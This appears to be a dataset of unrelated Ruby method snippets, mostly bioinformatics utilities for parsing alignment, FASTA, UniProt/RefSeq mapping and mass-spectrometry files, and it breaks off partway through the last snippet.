"def read_singletons(singletons, read_length)\n\t\tsingle_reads = {}\n\t\t\n\t\tFile.open(singletons, 'r').readlines.each do |line|\n \n \t\tline = line.strip.split(/\\s+/)\n \t\tqname, flag, chr, start = line[0..3] \t\n \t\tflag.to_i & 0x10 > 0 ? strand = -1 : strand = 1\n \t\tcigar = line[5]\n\t\t\tdistance = genomic_mappinglength(cigar, read_length)\n\t\t\t\n\t\t\tif distance != false\n\t\t\t\tstrand == 1 ? stop = start + distance : stop = start - distance\n\t\t\t\tsingle_reads[qname] = [chr, start, stop, strand]\n\t\t\tend\n\t\tend\n\t\tsingle_reads\n\tend",
"def hash_selectreads(samstring, samread, data, bamfile)\n\t\tselread = Hash.new {|h,k| h[k] = {} }\n\t\treadcount = 0;\n\t\tsamstring.split(\"\\n\").each do |string|\n\t\t\tsaminfo = string.split(\"\\t\")\n\t\t\tif samread.key?(saminfo[0]) == true\n\t\t\t\tterm = [saminfo[0], saminfo[1], saminfo[3]].join(\"_\")\n\t\t\t\tif data[bamfile].key?(term.to_s) == true\n\t\t\t\t\treadcount += 1\n\t\t\t\t\tselread[saminfo[0]][:cigar] = saminfo[5]\t\t\t\t\t\t\t# read id is key and cigar is value\n\t\t\t\t\tselread[saminfo[0]][:seq] = [saminfo[3], saminfo[9]].join(\"\\t\")\t# read id is key and alignment position & read sequence is value\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn selread, readcount\n\tend",
"def map_tgup_by_proteinid()\n # output unmatch list for map by gene_id (prefix of gene_id is first char of gene_id. (\"1\", \"2\", ..))\n refg_output = {}\n FileUtils.mkdir_p(\"#{$prepare_dir}/refg\") unless File.exist?(\"#{$prepare_dir}/refg\")\n (1..9).each do |prefix|\n refg_output[prefix.to_s] = File.open(\"#{$prepare_dir}/refg/#{prefix.to_s}.dat\", \"w\")\n end\n\n output_header\n\n # try mapping the same prefix of RefSeq data and UniProt data(for performance)\n Dir.glob(\"#{$prepare_dir}/refp/*.dat\") do |input_file|\n # parse data\n refseq_gene_list = []\n protein_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"protein_id prefix: #{protein_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n gene_id_prefix = columns[4].nil? ? \"\" : columns[4][0]\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n $count_nc += refseq_gene_list.size if protein_id_prefix == \"no_protein_id\" # no protein_id on RefSeq\n up_list = load_up_refp(protein_id_prefix) # get same prefix data from UniProt\n\n refseq_gene_list.each do |refseq_data|\n match = false\n output_tax(refseq_data) # output all gene-tax turtle\n unless up_list.nil? # exist prefix on UniProt\n match_list = up_list[refseq_data[:protein_id]]\n unless match_list.nil? # match some uniprot_ids\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid] # ignore unmatch tax\n output_idmap(refseq_data, up_info[:upid])\n match = true\n else # match protein_id but not match tax_id\n output_uptax(up_info)\n $taxup_list[up_info[:taxid]] = true\n $tax_mismatch[\"#{refseq_data[:taxid]}-#{up_info[:taxid]} : #{refseq_data[:protein_id]}\"] = true\n end\n end\n end\n end\n if match == false\n if refseq_data[:gene_id_prefix].nil? ||refseq_data[:gene_id_prefix] == \"\" # can't salvage it by gene_id.\n $no_up += 1\n else # output a file to each prefix of gene_id that can be salvaged by gene_id\n line = [refseq_data[:taxid], refseq_data[:gene_rsrc], refseq_data[:gene_label], refseq_data[:protein_id], refseq_data[:gene_id], refseq_data[:gene_id_prefix]]\n refg_output[refseq_data[:gene_id_prefix]].puts(line.join(\"\\t\"))\n end\n end\n $count += 1\n end\n end\n refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def map_tgup_by_geneid()\n Dir.glob(\"#{$prepare_dir}/refg/*.dat\") do |input_file|\n refseq_gene_list = []\n gene_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"gene_id prefix: #{gene_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n up_list = load_up_refg(gene_id_prefix) # get same prefix data from UniProt\n refseq_gene_list.each do |refseq_data|\n match = false\n unless up_list.nil? # exist prefix list on UniProt\n match_list = up_list[refseq_data[:gene_id]]\n unless match_list.nil?\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid]\n output_idmap(refseq_data, up_info[:upid])\n match = true\n end\n end\n end\n end\n if match == false\n $no_up += 1\n end\n end\n end\nend",
"def output_idmap(refseq_data, up)\n taxid = refseq_data[:taxid]\n gene_label_url = URI.escape(refseq_data[:gene_label])\n up = up.split(\"-\").first if up.index(\"-\") # with \"-\" means isoform's ID. expect to protein's ID\n\n unless $gene_up_list[\"#{refseq_data[:gene_rsrc]}:#{up}\"]\n $output_ttl.puts triple(\"<http://togogenome.org/gene/#{taxid}:#{gene_label_url}>\", \"rdfs:seeAlso\", \"upid:#{up}\")\n $output_ttl.puts triple(\"upid:#{up}\", \"rdf:type\", \"<http://identifiers.org/uniprot>\")\n $output_ttl.puts triple(\"upid:#{up}\", \"rdfs:seeAlso\", \"up:#{up}\")\n $output_ttl.puts triple(\"up:#{up}\", \"dct:publisher\", \"<http://identifirs.org/miriam.resource/MIR:00100134>\") # UniProt (www.uniprot.org)\n $output_ttl.puts triple(\"upid:#{up}\", \"rdfs:seeAlso\", \"tax:#{taxid}\")\n $gene_up_list[\"#{refseq_data[:gene_rsrc]}:#{up}\"] = true # to prevent duplicate output\n $taxid_list[taxid] = true\n end\nend",
"def split_upids(idmap_file)\n puts \"split idmapping.dat to each prefix files\"\n up_refp_output = prepare_prefix_files(idmap_file, \"protein_id\")\n up_refg_output = prepare_prefix_files(idmap_file, \"gene_id\")\n\n cnt = 0\n # it is assumed that the tax_id is followed by a protein_id or gene_id\n current_tax = {upid: nil, tax_id: nil}\n taxid_missing_list = [] \n File.open(idmap_file, \"r\") do |f|\n f.each_line do |line|\n up, xref, id = line.strip.split(\"\\t\")\n case xref\n when \"NCBI_TaxID\"\n current_tax = {upid: up.split(\"-\").first, tax_id: id}\n when \"RefSeq\", \"GeneID\"\n # Push only the tax_id with refseq protein_id or gene_id\n if current_tax[:upid] == up.split(\"-\").first\n if xref == \"RefSeq\"\n prefix = id.chomp.strip[0..4]\n up_refp_output[prefix].puts line.chomp.strip + \"\\t\" + current_tax[:tax_id]\n elsif xref == \"GeneID\"\n prefix = id.chomp.strip[0]\n up_refg_output[prefix].puts line.chomp.strip + \"\\t\" + current_tax[:tax_id]\n end\n else\n taxid_missing_list.push(up)\n end\n end\n cnt += 1\n if (cnt % 100000 == 0)\n puts cnt\n end\n end\n # list of upid that can't get taxid. Depends on the order of idmapping.dat\n out = File.open(\"taxid_missing_list.json\", \"w\") unless taxid_missing_list.size == 0\n taxid_missing_list.each do |upid|\n out.puts JSON.pretty_generate(taxid_missing_list)\n end\n end\n\n # close files\n up_refp_output.each do |k, v|\n v.flush\n v.close\n end\n up_refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def cache_ids()\n hit_values = File.open(@mzid_file) do |io|\n doc = Nokogiri::XML.parse(io, nil, nil, Nokogiri::XML::ParseOptions::DEFAULT_XML | Nokogiri::XML::ParseOptions::NOBLANKS | Nokogiri::XML::ParseOptions::STRICT)\n doc.remove_namespaces!\n root = doc.root\n \n cache_db_seq_entries(root)\n cache_pep_ev(root)\n \n peptide_lst = root.xpath('//Peptide')\n @pep_h = Hash.new\n @mod_h = Hash.new\n peptide_lst.each do |pnode|\n \n pep_id = pnode['id']\n pep_seq = get_peptide_sequence(pnode)\n mod_line = get_modifications(pnode)\n @pep_h[pep_id] = pep_seq \n @mod_h[pep_id] = mod_line \n end\n \n end\n end",
"def hash_mm_selreads(cigarstring, selread)\n\t\thash = Hash.new {|h,k| h[k] = {} }\n\t\tcount = 0\n\t\tcigarstring.split(\",\").each do |cig|\n\t\t\tcigar = Cigar.find_by(id: cig)\n\t\t\tif selread.key?(cigar.read_id.to_s) == true\n\t\t\t\tif selread[cigar.read_id.to_s][:cigar] != cigar.data.to_s\n\t\t\t\t\thash[cigar.read_id] = [cigar.data, cigar.pos].join(\"\\t\")\n\t\t\t\t\tcount = count + 1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn hash, count.to_i\n\tend",
"def outputs\n id_array = []\n reads.each do |read|\n id = \"s_#{self.lane}_#{read}_#{self.barcode_string}.fastq.gz\"\n id_array << id\n end\n id_array\n end",
"def reverse_get mapping\n (@map.rassoc(mapping) || (raise \"#{mapping} is not a mapping of a registered id\"))[0]\n end",
"def uniqueSequences file\n\n seqIDs = {}\n printSeq = 1\n File.open(file,\"r\") do |f|\n while l = f.gets\n if l[0] == \">\"\n key = l.split(\"\\n\")[0].split(\" \")[0]\n if seqIDs.has_key? key\n printSeq = 0\n else\n seqIDs[\"#{key}\"] = 0\n printSeq = 1\n puts l\n end\n elsif printSeq == 1\n puts l\n end\n end\n end\n\n end",
"def selectreads(samstring, samread, data, bamfile)\n\t\tselread = Hash.new {|h,k| h[k] = {} }\n\t\treadcount = 0;\n\t\tsamstring.split(\"\\n\").each do |string|\n\t\t\tsaminfo = string.split(\"\\t\")\n\t\t\tif samread.key?(saminfo[0]) == true\n\t\t\t\tterm = [saminfo[0], saminfo[1], saminfo[3]].join(\"_\")\n\t\t\t\tif data[bamfile].key?(term.to_s) == true\n\t\t\t\t\treadcount += 1\n\t\t\t\t\tselread[saminfo[0]][:cigar] = saminfo[5]\n\t\t\t\t\tselread[saminfo[0]][:bwapos] = saminfo[3]\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn selread, readcount\n\tend",
"def read_seq(seq_file)\n seq_objs = Hash.new\n Bio::FlatFile.open(seq_file, \"r\").each_entry do |f|\n seq_objs[f.definition] = f\n end\n return(seq_objs)\nend",
"def duplicate_imports_info\n import_frequency_mapping = {}\n all_imports.uniq.each do |item|\n item_occurrence = all_imports.count(item)\n if item_occurrence > 1\n import_frequency_mapping[item.chomp] = item_occurrence\n end\n end\n import_frequency_mapping\n end",
"def paired_nodes(node)\n to_return_node_ids = Set.new\n log.debug \"Found #{node.short_reads.length} short reads associated with node #{node}\" if log.debug?\n node.short_reads.each do |read|\n pair_read_id = @velvet_sequences.pair_id(read.read_id)\n unless pair_read_id.nil? #i.e. if read is paired\n @read_to_nodes[pair_read_id].each do |node_id|\n to_return_node_ids << node_id\n end\n end\n end\n # Convert node IDs to node objects and return\n return to_return_node_ids.to_a\n end",
"def mapping; end",
"def mapping; end",
"def genome(liszt)\n=begin\n[samopen] SAM header is present: 2 sequences\n7621912 reads; of these:\n 4009241 (52.60%) were paired; of these:\n 1983557 (49.47%) aligned concordantly 0 times\n 1818685 (45.36%) aligned concordantly exactly 1 time\n 206999 (5.16%) aligned concordantly >1 times\n ----\n 1983557 pairs aligned concordantly 0 times; of these:\n 409503 (20.64%) aligned discordantly 1 time\n ----\n 1574054 pairs aligned 0 times concordantly or discordantly; of these:\n 3148108 mates make up the pairs; of these:\n 1009275 (32.06%) aligned 0 times\n 35392 (1.12%) aligned exactly 1 time\n 2103441 (66.82%) aligned >1 times\n 3612671 (47.40%) were unpaired; of these:\n 498719 (13.80%) aligned 0 times\n 2246121 (62.17%) aligned exactly 1 time\n 867831 (24.02%) aligned >1 times\n=end\n #puts(liszt);exit\n dict={}; liszt.shift\n dict[\"total\"]=liszt.shift.split[0]; #liszt.shift\n dict[\"paired\"]=liszt.shift.split[0]; liszt.shift #conc 0\n dict[\"conc_once\"]=liszt.shift.split[0]\n dict[\"conc_mult\"]=liszt.shift.split[0]\n liszt.shift(2); dict[\"disc_once\"]=\"\"; dict[\"disc_mult\"]=\"\"\n line=liszt.shift\n line.include?(\">1 times\") ? dict[\"disc_mult\"]=line.split[0] : dict[\"disc_once\"]=line.split[0]\n liszt.shift\n dict[\"unaligned_pairs\"]=liszt.shift.split[0]\n liszt.shift\n dict[\"unmates\"]=liszt.shift.split[0] #unaligned mates\n dict[\"mate_once\"]=liszt.shift.split[0]\n dict[\"mate_mult\"]=liszt.shift.split[0]\n dict[\"unpaired\"]=liszt.shift.split[0]\n dict[\"unpair_unaligned\"]=liszt.shift.split[0]\n dict[\"unpair_once\"]=liszt.shift.split[0]\n dict[\"unpair_mult\"]=liszt.shift.split[0]\n dict\nend",
"def loadMap()\n\t\treturn @rankedDB.execute(\"SELECT map FROM ranked WHERE idMap = '#{@idMap}'\").shift.shift\n\tend",
"def generate_identity_map(source_url, source_body)\n mp = []\n source_body.split(\"\\n\").each_with_index do | line, n |\n last_col = line.length\n mp << SourceMap::Mapping.new(source_url, SourceMap::Offset.new(n, 0), SourceMap::Offset.new(n, 0))\n mp << SourceMap::Mapping.new(source_url, SourceMap::Offset.new(n, last_col), SourceMap::Offset.new(n, last_col))\n end\n SourceMap::Map.new(mp)\n end",
"def loci\n CSV.read(@file).map do |row|\n {\n :name => row[@columns[:name]],\n :target => row[@columns[:target]],\n :strand => STRAND_TOKENS[row[@columns[:strand]]],\n :start => row[@columns[:start]].to_i - 1, # This arithmetic gives\n :stop => row[@columns[:stop]].to_i, # inclusive, one-indexed\n # slices\n }\n end\n end",
"def read_mrp\n $MRP_FILE = $PRJ_NAME + \"_map.mrp\"\n f = open($MRP_FILE,\"r\")\n while line = f.gets\n if /ERROR/ =~ line\n /LOC=(.*)\\)/ =~ line # pick up Slice name\n $ERROR_SLICE << $1\n end\n end\n f.close\n $ERROR_SLICE.uniq!\nend",
"def compute_index \n self.rewind\n r = %r{\\<scan\\snum\\=\\\"(\\d+)\\\"|\\<spectrum\\sid\\=\\\"(\\d+)\\\"}\n index = {}\n while (!self.eof) \n pos = self.pos\n if (r.match(self.readline)) then \n m = $1 ? $1 : $2\n index[m.to_i] = pos\n end\n end\n index\n end",
"def readIDSFile(filename, char_hash)\n File.open(filename) do |f|\n while (line = f.gets)\n next if line.match(/^;;/) # line commented out?\n a = line.strip.split(\"\\t\")\n char_hash[a[0]] = Hash.new() unless char_hash.has_key? a[0]\n char_hash[a[0]][:ids] = a[2].to_u\n end\n end\nend",
"def construct_id_map_for_composite(records)\n id_to_record_map = {}\n ids = []\n records.each do |record|\n primary_key ||= record.class.primary_key\n ids << record.id\n mapped_records = (id_to_record_map[record.id.to_s] ||= [])\n mapped_records << record\n end\n ids.uniq!\n return id_to_record_map, ids\n end",
"def km_get_reacid(data)\n return data.map{|d| d.scan(/(?<r>R\\d{5})/)}.flatten.sort\nend",
"def extract_ids\n # no-op\n end",
"def raw_userids\n users = {}\n cmd = \"find /data/log/ctr -name 'ctr*.gz' -mtime -2 | xargs zcat\" \n IO.popen(cmd) do |io|\n while line = io.gets\n r = get_uid(line)\n #users[r[0]] = true # from cookie\n users[r[1]] = true # from sifi param\n end \n end\n users\nend",
"def before_mapping_hash(gid_array)\n @log.info \"BEFORE_MAPPING_HASH\"\n ##TODO test test test\n\n hash = Hash.new\n gid_array.each { |gid| hash[gid] = @redis_connector.real_partition_of_node(gid).to_i }\n hash\n end",
"def prepare_reads(base, map, fqgz0, *fqgzs0)\n\n fqgzs = [fqgz0] + fqgzs0\n\n bcs = Hash.new\n open(map, 'r').each do |line|\n bc, well = line.rstrip.split(',')\n bcs[bc] = well\n end\n \n bcl = bcs.keys.map!{|key| key.length}.sort.uniq[0]\n\n tso_pattern = '.'*options.umi_length + '.'*bcl + 'GG'\n\n #\n \n STDERR.puts \"#{`date`.strip}: Demultiplexing each raw sequence files...\"\n \n fqgz2csv0 = Hash.new\n fqgz2csv1 = Hash.new\n fqgz2base = Hash.new\n fqgzs.each do |fqgz|\n fqgz2csv0[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2csv1[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2base[fqgz] = get_temporary_path('strt.preprocess', 'base', false)\n end\n\n Parallel.map(fqgz2csv0.keys, in_processes: options.parallel) do |fqgz|\n cmds = [\n \"unpigz -c #{fqgz}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv0[fqgz]}\",\n \"fq1l match_5end#{grep_prefix_option(options)} #{tso_pattern}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv1[fqgz]}\",\n \"fq1l annotate_index --first-cycle=#{options.umi_length+1} --last-cycle=#{options.umi_length+bcl}\",\n \"fq1l annotate_umi --first-cycle=1 --last-cycle=#{options.umi_length}\",\n \"fq1l sort_index#{coreutils_prefix_option}#{parallel_option(options)} --buffer-size=#{(options.maximum_memory/(fqgz2csv0.keys.size+1)).to_i}%\",\n \"fq1l demultiplex #{fqgz2base[fqgz]} #{map}\"\n ]\n cmds.insert(2, \"#{head_command(options)} -n #{options.reads}\") unless options.reads.nil?\n stats = Open3.pipeline(*cmds)\n stats.each_index do |i|\n raise \"Fail at process #{i}; #{stats[i]}; #{cmds[i]}\" unless stats[i].success? || (stats[i].signaled? && stats[i].termsig == 13)\n end\n end\n\n system \"fq1l sum_counts #{fqgz2csv0.values.join(' ')} > #{base}.count.step1.csv\"\n unlink_files(fqgz2csv0.values)\n \n system \"fq1l sum_counts #{fqgz2csv1.values.join(' ')} > #{base}.count.step2.csv\"\n unlink_files(fqgz2csv1.values)\n\n #\n \n (bcs.values + ['NA']).each do |well|\n\n STDERR.puts \"#{`date`.strip}: Finishing well #{well}...\"\n \n tmpfqgzs = fqgz2base.values.map {|base| \"#{base}.#{well}.fq.gz\"}\n csvs = Array.new(6) {|i| \"#{base}.#{well}.count.step#{i+3}.csv\"}\n \n pipeline(\"unpigz -c #{tmpfqgzs.join(' ')}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[0]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_duplicate\",\n \"#{fq1l_count_command(options)} #{csvs[1]}\",\n \"fq1l trim_3end_quality\",\n \"#{fq1l_count_command(options)} #{csvs[2]}\",\n \"fq1l trim_3end_primer#{coreutils_prefix_option}#{grep_prefix_option(options)}#{parallel_option(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[3]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_degenerate\",\n \"#{fq1l_count_command(options)} #{csvs[4]}\",\n \"fq1l trim_5end --minimum-length=#{options.minimum_length} #{tso_pattern}+\",\n \"#{fq1l_count_command(options)} #{csvs[5]}\",\n \"fq1l restore#{coreutils_prefix_option}\",\n \"pigz -c > #{base}.#{well}.fq.gz\")\n \n unlink_files(tmpfqgzs)\n \n end\n \n end",
"def mappa_e_rimuovi_duplicati(&block)\n self.map.with_index(&block).uniq\n end",
"def candidates2fa(input_file, fasta, read_length, output_file, exoncov=8)\n\t\tchromosomes = {}\n\t\tpositions = []\n\t\t\n\t\t# Input into hash sorted by chromosomes\n\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")[0..-2]\n\t\t\tchr_a, pos_a, strand_a, chr_b, pos_b, strand_b = line[0..5]\n\t\t\tpos = [chr_a, pos_a, chr_b, pos_b].join(':')\n\t\n\t\t\tchromosomes[chr_a] = {} if !chromosomes.has_key?(chr_a)\n\t\t\t\n\t\t\tif !chromosomes.has_key?(chr_b)\n\t\t\t\tchromosomes[chr_a][chr_b] = [line]\n\t\t\n\t\t\t# 2nd elsif to exclude reads that map on same junction but opposite ends\t\t\n\t\t\telsif chromosomes[chr_a].has_key?(chr_b) && !positions.include?(pos)\n\t\t\t\tchromosomes[chr_a][chr_b].push(line)\n\t\t\t\tpositions << pos\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\toutput = File.open(output_file, 'w') do |output|\n\t\t\tchromosomes.each do |chr_a, values|\n\t\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\t\t\t\t\n\t\t\t\tvalues.each do |chr_b, values|\n\t\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n\t\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t\tvalues.each do |v|\n\t\t\t\t\t\tbp_a, bp_b = v[1].to_i, v[4].to_i\n\t\t\t\t\t\tstrand_a, strand_b = v[2], v[5]\n\t\t\t\t\t\toverlap = v[-1].to_i - read_length\n\t\t\t\t\t\tl = read_length - exoncov \n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tupstream = dna_a[bp_a..bp_a + overlap + l].upcase\t\n\t\t\t\t\t\tdownstream = dna_b[bp_b - l - overlap + 1..bp_b - overlap].upcase\n\t\t\t\t\t\n\t\t\t\t\t\tif strand_a == '1' && strand_b == '-1'\n\t\t\t\t\t\t\tdownstream = Alignment.reverse_complement(dna_b[bp_b..bp_b + l].upcase)\n\t\t\t\t\t\telsif strand_a == '-1' && strand_b == '1'\n\t\t\t\t\t\t\tupstream = Alignment.reverse_complement(dna_a[bp_a - l + 1..bp_a].upcase)\n\t\t\t\t\t\tend\n\t\t\n\t\t\t\t\t\tid = [v[0..1], v[3..4]].join(':')\n\t\t\t\t\t\toutput.puts [\">#{id}\", downstream + upstream].join(\"\\n\")\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Wrote loci to fasta-file.\"\n\tend",
"def read_last_scans(csv_file_name)\r\n file_identifier_histories = Hash.new(-1)\r\n CSV.foreach(csv_file_name, headers: true) do |row|\r\n file_identifier_histories[row[0]] = row[1]\r\n end\r\n file_identifier_histories\r\n end",
"def write_rmap rmap\n\nend",
"def read_replica_identifiers\n data[:read_replica_identifiers]\n end",
"def read_data stream=STDIN\n\tdata = {}\n\tstream.each do |line|\n\t\tline =~ /^([0-9]*)\\|(.*)/;\n\t\tid, name_addr = $1.to_i, $2\n\t\traise \"duplicate id #{id}?\" if data[id]\n\t\tdata[id] = name_addr\n\tend\n\tdata\nend",
"def gather_rlocs(fh)\n\t\t(0...@nrlocs).each do |rlocnum|\n\t\t\tloc, seg, ref, type, extra = getl(fh).split(' ', 5)\n\t\t\t\n\t\t\t@rlocrecs[rlocnum] = build_rlocrec(loc.hex, seg.hex, ref.hex, type, extra)\n\t\tend\n\tend",
"def read_fasta(fasta_file)\r\n fasta_name = \"\"\r\n fasta_seqs = {}\r\n seq = \"\"\r\n File.open(fasta_file).each do |line|\r\n if !(line.nil?)\r\n if line.start_with? \">\"\r\n seq = \"\"\r\n fasta_name = line.chomp.split(\">\")[1]\r\n elsif\r\n seq = seq + line.chomp\r\n fasta_seqs[fasta_name] = seq\r\n end\r\n end\r\n end\r\n return fasta_seqs\r\nend",
"def read(name)\n mappers[name]\n end",
"def read(name)\n mappers[name]\n end",
"def filter_existing_docs(docs)\n result = []\n docs.each do |d|\n next if !d\n doc_hash = d.inspect.to_md5\n if @docs_read[d[:did]] != doc_hash\n result << d\n @docs_read[d[:did]] = doc_hash\n #else\n #debug \"[filter_existing_docs] document #{d[:did]} already read!\"\n end\n end\n result\n end",
"def index_commands\n File.foreach \"#{$userfile}\" do |line|\n\tline = line.chomp\n\tif !$unique_seq.include?(line)\n\t $unique_seq << line\n\tend\n end\n File.foreach \"#{$userfile}\" do |line|\n\tline = line.chomp\n\t$observation_seq << $unique_seq.index(line)\n end\nend",
"def duplicate_ids\n return [] if accession_number.nil?\n Image.where(accession_number_ssim: @accession_number)\n end",
"def gather_from_csv\n items = {}\n FasterCSV.foreach(@plucked_out_items_csv, FCSV_OPTS){|line|\n STDERR.puts \"ERROR: RMID not found for item_id #{line[:item_id].chomp} in CSV-file #{@plucked_out_items_csv}\" unless line[:rmid]\n items[ line[:item_id].chomp ] = {\n :handle => line[:item_hdl].chomp,\n :rmid => line[:rmid].chomp,\n #:collection_handle => line[:col_owner_hdl].chomp,\n }\n }\n items\n end",
"def match_assembly\n @assembly_map = {}\n lines.each { |lno, assems|\n assems.each { |assem|\n if @assembly_map[assem].nil? then\n @assembly_map[assem] = [lno]\n else \n @assembly_map[assem] << lno\n end\n }\n \n }\n end",
"def map_data_to_uuids\n\t\t@storage.invert\n\tend",
"def hashNQS()\n @hash_nqs={}\n nqsReader=File.open(@nqsFile,\"r\")\n nqsReader.each do |line|\n cols=line.split(/\\s+/)\n \n name=cols[0]\n next if name==\"readName\"\n length=cols[1]\n dist=cols[2]\n qual=cols[3].to_i\n pass=cols[4]\n \n str_result=length+'.'+pass\n str=name+'.'+dist\n if @hash_nqs[str]==nil\n @hash_nqs[str]=str_result\n end\n end\n nqsReader.close\n $stderr.puts @hash_nqs.size\nend",
"def get_original_gene_ids\n # I create a list containing all locus gene and I save the original ids to create the networks\n gene_rows = @arabidopsis_genelist.rows\n gene_rows.each do |row|\n gene = Gene.new(row['Gene_ID'])\n created_gene = gene ? @gene_database.get_gene(gene.gene_id) : false\n if created_gene\n @original_genes.append(created_gene)\n end\n end\n @original_genes\n end",
"def capture_output(mapping)\n ios = mapping.keys\n\n until ios.empty?\n readable_ios, = IO.select(ios, [], [])\n ios_ready_for_eof_check = readable_ios\n\n # We can safely call `eof` without blocking against previously selected\n # IOs.\n ios_ready_for_eof_check.select(&:eof).each do |src|\n # `select`ing an IO which has reached EOF blocks forever.\n # So you have to delete such IO from the array of IOs to `select`.\n ios.delete(src)\n end\n\n break if ios.empty?\n\n readable_ios.each do |io|\n begin\n data = io.read_nonblock(1024)\n mapping.fetch(io).call(data)\n rescue EOFError\n ios.delete(io)\n end\n end\n\n ios_ready_for_eof_check = ios & readable_ios\n end\n end",
"def extract(map)\n # clone map hash, swap keys for string\n map = Hash[map]\n map.keys.each { |k|\n map[k.to_s] = map[k]\n map.delete(k) unless k.is_a?(String)\n }\n\n groups = []\n i = 0\n while(i < length) do\n val = self[i]\n i += 1\n next unless !!map.has_key?(val)\n\n num = map[val]\n group = [val]\n 0.upto(num-1) do |j|\n group << self[i]\n i += 1\n end\n groups << group\n end\n\n groups\n end",
"def uniq(networkcheckoutput)\n mash = Hashie::Mash.new networkcheckoutput\n #networkcheckoutput.hits.hits.each do |value|\n\n #this creates a dataset of unique values based on a specified field. Need to break the Date out of the timestamp field to use.\n seen = Set.new\n mash.hits.hits.inject([]) do |kept, record|\n\n\n #brokenfield = record._source.src_ip.match(/\\w++ [^_]\\w/)\n\n unless seen.include?(record._source.src_ip)\n kept << record\n seen << record._source.src_ip\n end\n kept\n end\n end",
"def process_fna(fna_file)\n fna_hash = Hash.new\n input = File.new(fna_file,'r')\n first_loop = true\n dna_seq = \"\"\n id = \"\"\n count = 0\n while(line = input.gets)\n if(line[0..0] == '>')\n if(first_loop == false)\n fna_hash[id] = dna_seq\n end\n position=line.split(\"|\")\n id = position[3][0..-3]\n dna_seq = \"\"\n first_loop = false\n else\n count = count+1\n dna_seq.concat(line[0..-2])\n end\n end\n fna_hash[id] = dna_seq\n return(fna_hash)\nend",
"def find_unique all_hash\n unique = []\n\n all_hash.each_pair do |full_name, cm|\n unique << cm if full_name == cm.full_name\n end\n\n unique\n end",
"def find_replicates(params)\n unless ( params[:geoid_string].nil? ^ params[:geoid_file].nil?) then\n fr_puts \"Received both a :geoid_string and :geoid_file parameter--exactly one is required! Aborting!\"\n throw :needs_exactly_one_geoid_string_or_file\n end\n @batchmode = ! params[:geoid_file].nil?\n # If running in batch, set up the file to get geoids from\n if @batchmode then\n f = File.new(params[:geoid_file])\n else\n f = [params[:geoid_string]]\n end \n output_basedir = Dir.new(params[:output_dir])\n # This ought to be a constant\n no_db_commits = params[:no_db_commits]\n @calling_command = params[:calling_command]\n\n all_infos = [] # All info hashs discovered \n # Only save list of marshalled infos if in batchmode\n marshal_list = File.new(File.join(output_basedir.path, \"marshal_list.txt\"), \"w\") if @batchmode\n \n # For each line in the file (or the single array entry)\n # figure out what the geoids ought to be and stick them in a hash\n f.each { |line|\n line.chomp!\n (pid, gse, gsms, target_column, sdrf) = line.split(/\\t/)\n gsms = gsms.split(/,/)\n \n info = {} # Hash containing calculated geoid information\n info[:pid] = pid\n\n header = parse_sdrf(sdrf)\n s = header.reverse\n\n fr_puts \"modencode_#{pid} has #{gsms.size.inspect} GSMs\" \n fr_puts \"and we have #{header[0].rows.inspect} rows\"\n\n if gsms.size != header[0].rows then\n raise Exception.new(\"Must supply as many GSMS as rows! SDRF has #{header[0].rows} rows, but received #{gsms.size} GSMS.\")\n end\n\n column_specified = false\n target_column = target_column.to_i\n \n colname = header[target_column].name\n if colname =~ /geo/i then\n fr_puts \"Using existing GEOid column #{colname}\"\n else\n fr_puts \"Using protocol #{header[target_column].split_example}.\"\n column_specified = true\n end\n\n # if it's not geo, use it as protocol:\n if( column_specified ) then \n \n # get previous_protocol (ie target) and the one after it\n previous_protocol = header[target_column]\n previous_protocol_name = previous_protocol.split_example unless previous_protocol.nil?\n next_protocol = header.slice(target_column +1, header.length).find{|col| col.heading =~ /Protocol REF/i}\n next_protocol_name = next_protocol.split_example unless next_protocol.nil?\n\n\n geo_record = SDRFHeader.new(\"Result Value\", \"geo record\") # make a new column\n # populate the geo record\n gsms.each_index{|i|\n geo_record.values[i] = gsms[i]\n }\n fr_puts \" Setting GSMs to: \" + geo_record.values.join(\", \") \n i = next_protocol.nil? ? header.size : header.find_index(next_protocol)\n header.insert(i, 